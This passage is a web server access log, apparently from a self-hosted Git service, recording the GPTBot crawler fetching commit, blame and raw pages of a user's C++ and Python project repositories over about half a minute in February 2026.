+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" +[17/Feb/2026:14:52:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:14:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=following" [Client 74.7.227.38] [Length 6371] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:14:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 13798] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:14:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" +[17/Feb/2026:14:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" +[17/Feb/2026:14:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" +[17/Feb/2026:14:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" +[17/Feb/2026:14:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" +[17/Feb/2026:14:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49490] [Gzip 26.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" +[17/Feb/2026:14:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11354] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" +[17/Feb/2026:14:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" +[17/Feb/2026:14:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" +[17/Feb/2026:14:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" +[17/Feb/2026:14:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 4132] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" +[17/Feb/2026:14:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" +[17/Feb/2026:14:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14854] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:52:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:52:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14234] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:53:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:53:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13827] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14997] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13825] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13828] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 14264] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14965] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10956] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 14994] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10919] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 20143] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 9884] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:14:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10209] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10414] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10212] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 4648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 14294] [Gzip 8.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:14:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 10415] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 10210] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 